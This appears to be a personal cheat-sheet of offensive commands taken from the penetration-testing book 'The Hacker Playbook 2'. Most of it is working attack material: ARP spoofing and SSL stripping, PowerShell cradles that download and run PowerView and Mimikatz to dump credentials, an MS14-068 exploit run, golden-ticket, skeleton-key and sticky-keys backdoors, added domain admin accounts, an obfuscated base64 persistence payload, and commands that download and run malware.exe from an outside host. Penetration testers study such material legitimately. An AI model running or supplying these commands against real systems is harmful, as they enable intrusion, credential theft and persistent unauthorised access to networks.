TheHackerPlaybook II

Disclaimer

BECAUSE OF THE RELEASE DATE OF THE BOOK, EVERYTHING HERE NEEDS FURTHER TEST. DON'T TAKE ANYTHING AND EXPECT IT TO WORK OFF THE BAT.

Scanning the Network

Passive Discovery Checklist

Creating Password Lists

Tools Checklist

Data Collection

Github Sensitive Info

External/Internal Active Discovery

  • Scanning with Masscan
  • Scanning with Sparta
  • Scanning with HTTP Screenshot
  • Scanning with Eyewitness/WMAP

Vulnerability Scanning

  • Scanning using Nexpose/Nessus/OpenVAS

Web Application Scanning

  • Scanning with Burp Proxy Pro (spider/discover content/active scanner)
  • Scanning with ZAP Proxy
  • Parsing Output (discover)

Injection

  • Burp pro with SQLMap API
  • Sqlmap
  • Sqlninja
  • NoSqlmap

CMS - Content Management Systems

  • CMSmap
  • Wpscan

XSS

  • BeeF

Moving in the Network

No Credentials

MITM and Sidejacking

  • Hamster/Ferret
# enable IP forwarding:
echo "1" > /proc/sys/net/ipv4/ip_forward

# modify IP tables for SSL Strip:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000

# configure and run SSL Strip:
sslstrip -f -a -k -l 1000 -w /root/out.txt &

# enable ARP spoof (remember this will ARP spoof everyone on the network):
arpspoof -i eth0 [gateway]

# enable Ferret. In a new terminal window:
ferret -i eth0

# enable Hamster. In a new terminal window:
hamster

DNS Redirection

  • Cain & Abel with SET

SSLStrip

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --toport 8080
sslstrip -l 8080
ettercap -TqM arp: remote /192.168.0.12/ /192.168.0.1/

Non-admin Credentials

Windows Enumeration

whoami /all && ipconfig /all && netstat -ano && net accounts && net localgroup
administrators && net share

# Check Window Patches
powershell.exe -command Get-HotFix

# Display All AD Users and Associated Information
Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1');
Get-NetUser

Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1');
Get-UserProperties -Properties name,memberof,description,info

wmic useraccount get /ALL /format:csv

# Enable Remote Desktop (requires administrative privileges)
set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0

# Enable Firewall for Remote Desktop
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

# Add a firewall rule
powershell.exe -command New-NetFirewallRule -DisplayName “Allow Inbound Port 80" -Direction Inbound –LocalPort 80 -Protocol TCP -Action Allow

powershell.exe -command New-NetFirewallRule -DisplayName "Block Outbound Port 80" -Direction Outbound –LocalPort 80 - Protocol TCP -Action Block

# View all services
powershell.exe -command Get-Service

# Restart service
powershell.exe -command Restart-Service

# Configure the DNS server
powershell.exe -command Get-Service SetDNSClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses 8.8.8.8

# Get a Process Listing
powershell.exe -command Get-Process
wmic process get caption,executablepath,commandline /format:csv

# Get a list of all computers from Active Directory
Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1');
Get-NetComputers

# Collection of information from the system, registries, and other information
Powershell.exe -exec bypass IEX "(New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/nishang/master/Gather/GetInformation.ps1');
Get-Information

# Search the network for which computers the Domain Admins are using
Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1');
Invoke-Userhunter

# Find out which computer a specific AD user is on. In this example, we will look for the domain user “domainA” who is a domain administrator
Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1');
Invoke-UserHunter -UserName "domainA"

# Finding Open Shares
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (NewObject
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1');
"Invoke-ShareFinder -ExcludeIPC -ExcludePrint -CheckShareAccess |
Out-File -Encoding ascii found_shares.txt"

# List all the open shares on the network (very loud)
Powershell.exe -exec bypass IEX "(New-Object
Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1’);
Invoke-Netview

# List of all Active Directory users and the associated information with their accounts
Powershell.exe -exec bypass IEX "(New-Object
Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1’);
Get-UserProperties -Properties name,memberof,description,info"

# Automate post exploitation information gathering
Powershell.exe -exec bypass IEX "(New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/nishang/master/Gather/GetInformation.ps1')";

Get-Information

# Get Local Windows Accounts
wmic useraccount get /ALL /format:csv

# Find Domain Controllers
nltest /DCLIST:[Domain]

# List Domain Admins and Local Admins
net group “Domain Admins” /domain
net localgroup administrators /DOMAIN

Domain Trusts

# Show the relationship between the different domain trusts
Powershell.exe -exec bypass IEX "(New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1');
Invoke-MapDomainTrusts | Export-CSV -NoTypeInformation trusts.csv"

# Find information about members of a given local group
Powershell.exe -exec bypass IEX "(New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1');
Get-NetLocalGroup -HostName it.rockets.testlab

Group Policy Preferences

# msf
use post/windows/gather/credentials/gpp
set SESSION [Session # of your shell]
exploit

https://github.com/rapid7/metasploitframework/blob/master/modules/post/windows/gather/credentials/gpp.rb

https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/GetGPPPassword.ps1

# mount
\\[Domain Controller]\SYSVOL\[Domain]\Policies

OS X Enumeration

OSXCollector

Admin Credentials

  • psexec (meterpreter: ps migrate getsystem mimikatz kerberos/wdigest)
  • psexec_command (net group "Domain Admins" /domain (list all Domain Admins on servers)
    qwinsta (list about user session information)
    Create Additional Administrative Accounts on All Hosts
    net user username password /ADD /DOMAIN
    net group "Domain Admins" username /ADD /DOMAIN
    net localgroup Administrators username /ADD))

Move Laterally With WMI

wmic /USER:"hacker\testuser1" /PASSWORD:"!Asdfasdfasdf1!"
/NODE:172.16.151.201 process call create "powershell.exe -exec bypass IEX (NewObject
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/InvokeMimikatz.ps1'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt"

Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PewPewPew/InvokeMassMimikatz.ps1'); "'win7','win8' | Invoke-MassMimikatz -Verbose -FireWallRule"

Kerberos - MS14-068

git clone https://github.com/bidord/pykek /opt/pykek/
apt-get install krb5-user
apt-get install rdate
rdate -n [Domain]
echo 172.16.151.200 dc.hacker.testlab >> /etc/hosts

# four pieces of information
-u username@domain [example: limiteduser@hacker.testlab
-d domain controller [example: dc.hacker.testlab
-p password
-s SID [example: S-1-5-21-3525058729-1821581466-2040179600-1111]

# get sid
whoami /user

cd /opt/pykek/
python ms14-068.py -d dc.hacker.testlab -u limiteduser@hacker.testlab -s S-1-5-21-3525058729-1821581466-2040179600-1111 -p '!Asdfasdfasdf1!'

cp TGT_limiteduser@hacker.testlab.ccache /tmp/krb5cc_0

smbclient -k -W hacker.testlab //dc.hacker.testlab/c$ -k

# do a dir \\dc\c$ and have full access to the victim host

Pass-The-Ticket

mimikatz

privilege :: debug
sekurlsa::tickets /export

kerberos::ptt [0;ab9bf]-2-1-40e10000-lab@krbtgt-HACKER.TESTLAB.kirbi

Lateral Movement With Postgres SQL

Pulling Cached Credentials

use post/windows/gather/cachedump
set SESSIONS 1
exploit

oclHashcat64.exe -m 2100 hashes\mscash2.txt lists\crackstat_realhuman_phill.txt
oclHashcat64.exe -m 2100 hashes\mscash2.txt lists\crackstat_realhuman_phill.txt -r rules\InsidePro-HashManager.rule --force

Attacking the Domain Controller

  • SMBExec
msf > use auxiliary/admin/smb/psexec_ntdsgrab
msf auxiliary(psexec_ntdsgrab) > show actions
    ...actions...
msf auxiliary(psexec_ntdsgrab) > set ACTION < action-name >
msf auxiliary(psexec_ntdsgrab) > show options
    ...show and set options...
msf auxiliary(psexec_ntdsgrab) > run

esedbexport -t [Location of Export] [NTDS.dit file]
dshashes.py [datatable table] [link_table] --passwordhashes [original bin file from ntdsgrab]

Persistence

  • Veil
%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(‘nVRtb9pIEP7OrxhZe5KtYMe8NE2wIpWSps1doTSk...pKRtsdc50r/fbvydssrxWXDNcdcIwpKMbetG0bth1qazIMKBVRaPzejRFMOSmSLmkuQx0vnZZ3oSwCdOXjZ65bEWbREan7XpeE/YgVWl05fCXQ4hNtmpWR1htnC6tr0pJstn9VvyJRMxp8TDWpOvTk24Ybmn8cbrZ/gI=’)))), [IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd();"
  • Golden Ticket
# information needed
# Domain
whoami

# Domain Admin User
net localgroup administrators /DOMAIN

# Domain SID, chop off the last dash and four digits
whoami /user

# NTLM hash of Krbtgt
secretsdump.py

use kiwi

golden_ticket_create -u <Domain Admin Username> -d <Domain> -k <krbtgt hash> -s <Domain SID> -t <Location to Drop Golden Ticket>

kerberos_ticket_list

kerberos_ticket_purge

kerberos_ticket_use /opt/ticket.txt

shell

dir \\DC\c$

# check if worked, use wmi to execute command remotely
wmic /authority:"Kerberos:hacker.testlab\win8" /node:win8 process call create "cmd /c ping 127.0.0.1 > C:\log.txt"
  • Skeleton Key
mimikatz.exe “privilege::debug” “misc::skeleton” exit

# log on to host using backdoored password “mimikatz”, or do something like
net use * \\dc\c$ mimikatz /user:lab@hacker.testlab
  • Sticky Keys
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0

# Allow RDP
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

# Enable Remote Desktop Connections
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# above commands can be executed by wmi (need local admin)
wmic /user:[User_Name] /password:[Password] /node:[Server] process call create
"C:\Windows\system32\reg.exe ADD \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\" /v Debugger /t REG_SZ
/d \"C:\windows\system32\cmd.exe\" /f"

wmic /user:[User_Name] /password:[Password] /node:[Server] process call create
"C:\Windows\system32\reg.exe ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDPTcp\" /v UserAuthentication /t REG_DWORD /d 0 /f"

wmic /user:[User_Name] /password:[Password] /node:[Server] process call create
"C:\Windows\system32\reg.exe ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDPTcp\" /v SecurityLayer /t REG_DWORD /d 0 /f"

wmic /user:[User_Name] /password:[Password] /node:[Server] process call create
"C:\Windows\system32\netsh advfirewall firewall set rule group=\"remote desktop\"
new enable=Yes"

wmic /user:[User_Name] /password:[Password] /node:[Server] process call create
"C:\Windows\system32\reg.exe ADD \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"

# RDP to that host without any credentials, hit shift 5 times, and get a system shell

Social Engineering

  • Doppelganger Domains
  • SMTP Attack
  • SSH Attack
  • Phishing (Manual Phishing Code)
  • Web Filtering Bypass for Your Domains - set up doppolganger domain's CANME to the target domain, and leave it for weeks, then alter the CNAME back to your own IP, then use SET to set up a cloned auth page
  • MS Excel Macro

Attacks That Require Physical Access

  • Exploiting Wireless (kismet)
  • Active Attacks (aircrack-ng)
  • WEP (Fern-Wi-Fi-Cracker)
  • WPAv2 (TKIP) - Wi-Fi Protected Access (Wifite, WifiPhisher)
  • Badge Cloning (Proxmark 3 Get It Working In Kali Nethunter)

Windows/OSX Exploit

  • Kon-Boot
  • Rubber Ducky

Drop Box

  • Raspberry Pi 2

Evading AV

Password Crack

  • Prince

Vulnerability Search

Windows Sniffer

netsh trace start capture=yes overwrite=no tracefile=C:\Users\Public\sniff.etl
netsh trace stop

# install Message Analyzer
powershell -exec bypass command "import-module PEF; $s = NewPefTraceSession -Path 'C:\Users\Public\OutFile.Cap' -SaveOnStop; $s | Add-PefMessageProvider -Provider 'C:\Users\Public\sniff.etl' ; $s | Start-PefTraceSession"

# load the cap file into wireshark and save it as pcap, then
python net-creds.py -p [pcap file]

Bypass UAC

# got a session
use exploit/windows/local/bypassuac_injection
set target 1
set PAYLOAD windows/x64/meterpreter/reverse_https
exploit

Kali Linux Nethunter

Building A Custom Reverse Shell

Evading Application Based Firewalls

Powershell

python ./easy-p
7 - Base64 Encode
1 - From File
/opt/PowerShell_Popup/popup.ps1

Windows 7/8 Uploading Files To The Host

cmd.exe /c "PowerShell (New-Object
System.Net.WebClient).DownloadFile('http://www.securepla.net/malware.exe','
malware.exe');(New-Object -com Shell.Application).ShellExecute('malware.exe')"

cmd.exe /c "bitsadmin /transfer myjob /download /priority high
http://www.securepla.net/malware.exe c:\ malware.exe&start malware.exe"

Pivoting

  • Autoroute and Auxiliary Scan
run autoroute -s 192.168.1.0/24
run autoroute -p
background
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.127
set PORTS 135,139,445
set THREADS 20
exploit

use auxiliary/scanner/discover/udp_probe
use exploit/windows/smb/psexec
  • Socks Proxy
route add 192.168.1.0 255.255.255.0 4
route print
use auxiliary/server/socks4a
run

gedit /etc/proxychains.conf
# change "socks4 127.0.0.1 4444" to "socks4 127.0.0.1 1080"
proxychains nmap -sT -P0 -p135,139,445 192.168.1.127
  • Move Laterally with Hashes
msf psexec_psh

psexec
  • Moving Laterally with NTLM Hashes
# with system shell
upload /opt/wce.exe C:\\users\\public
We can drop into a shell with the “shell” command and list our current hashes on the local machine:
shell
cd \users\public
wce -l
wce.exe -s [hash]
net use * \\dc\c$ /user:hacker\lab
  • Moving Laterally with WMI
wmic /USER:"hacker\testuser1" /PASSWORD:"!Asdfasdfasdf1!"
/NODE:172.16.151.201 process call create "powershell.exe -exec bypass IEX (NewObject
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/InvokeMimikatz.ps1'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt"
dir \\win8\c$\Users\Public\
type \\win8\c$\Users\Public\a.txt
del \\win8\c$\Users\Public\a.txt
  • Moving Laterally Using Services
copy malware.exe \\[Remote Machine]\C$\users\public

# create a service called Antivirus make sure to add the space between binpath= and your executable.
sc \\[Remote Machine] create Antivirus binpath= "c:\users\public\malware.exe"
sc \\[Remote Machine] start Antivirus
  • Proxy Between Hosts

One of the cheap and easy ways to proxy between hosts in segmented networks is to utilize a default Windows function. Netsh is a command line tool to modify network configurations. The following command will put the host in listening mode on port 8080 and redirect all requests to 192.168.5.33 over port 3389. This will be an easy way to proxy RDP traffic into other hosts. Remember you will need elevated privileges to run these commands

The great part about Netsh port proxy is that it supports IPv4 to Ipv6 proxying. You can now take one of the compromised hosts and proxy your RDP requests to that segmented network

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0
connectport=3389 connectaddress=192.168.5.33

reg add \\<Remote
IP>\HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
sc \\<Remote IP> start remoteregistry
sc \\<Remote IP> start remoteaccess
netsh
set machine <Remote IP>
interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0
connectport=3389 connectaddress=192.168.5.33

# for linux
mknod backpipe p
nc -l -p 8080 0<backpipe | nc 10.0.18.134 3389 | tee backpipe

Commercial Tools

  • Cobalt Strike
  • Immunity Canvas
  • Core Impact

References: